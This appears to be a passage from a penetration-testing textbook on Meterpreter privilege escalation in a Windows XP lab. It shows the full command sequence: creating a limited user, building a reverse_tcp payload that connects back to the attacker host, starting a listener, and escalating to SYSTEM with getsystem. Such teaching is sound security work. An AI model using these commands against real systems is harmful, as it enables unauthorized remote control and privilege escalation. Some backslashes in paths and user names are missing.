Now that we have access to the system, we can create a normal user account with limited permissions using the net user command. We’ll create a new user account to demonstrate how to elevate permissions as that user. (You will learn more about this in Chapter 8.)

When we compromise a limited user account, we will run into restrictions that prevent us from executing commands that require administrative-level permissions. By elevating an account’s permissions, we overcome that restriction.

On a Windows XP target machine, we enter the following command:

C:Documents and SettingsAdministrator>net user bob password123 /add.

Next, we create a Meterpreter-based payload, payload.exe, copy it to the target’s XP machine, and run it under the user account bob. This will be our new limited user account. In this example, we will use msfpayload to create a Meterpreter-based payload as a normal Windows executable. (We’ll discuss msfpayload in more detail in Chapter 7.)

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.33.129 LPORT=443 X > payload.exe 
root@bt:/opt/framework3/msf3# msfcli multi/handler
 PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=192.168.33.129 LPORT=443 E 
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1056)
meterpreter > getuid 
Server username: IHAZSECURITYob

The LHOST and LPORT options tell Metasploit that when it creates our Meterpreter payload it should connect back to our attacker machine on port 443. We then call the msfcli interface to start a listener handler for us. This listener handler will wait for connections, and when one is received, it will spawn a Meterpreter shell.

On the attacker machine, we create a new Meterpreter stand-alone executable at , copy the executable to the Windows XP machine, and run it under the user account bob.

We then set up a listener at to listen for the Meterpreter connection. After the target executes the payload on the system (payload.exe), we see a limited user Meterpreter console . We can, for example, generate a payload.exe on a Back|Track machine, copy the executable to a Windows XP machine, and set up a listener to get a Meterpreter session.

As shown in the next listing, we drop to a Meterpreter shell at and enter net user bob; we can see that user bob is a member of the Users group, is not an administrator, and has limited rights. We have a limited footprint from which to attack this device, and we can’t perform certain attacks, such as dumping the SAM database to extract usernames and passwords. (Luckily, Meterpreter has us covered, as you’ll see in a moment.) Our query complete, we press ctrl-Z, which saves our Meterpreter session and keeps us in the exploited system.

meterpreter > shell 
Process 2896 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:>net user bob

. . . SNIP . . .

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.
C:>^Z
Background channel 1? [y/N]  y

Now let’s get administrative or SYSTEM rights. As shown in the next listing, we enter use priv to load the priv extensions, which gets us access to the privileged module (which may already be loaded). Next, we enter getsystem in an attempt to elevate our privilege to that of local system, or administrator. We then verify that we have admin privileges with the getuid command. The server username returned is NT AUTHORITYSYSTEM, which tells us that we’ve succeeded at gaining administrator access.

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

To switch back to the previous user account where we initially got our Meterpreter shell, we’d use rev2self.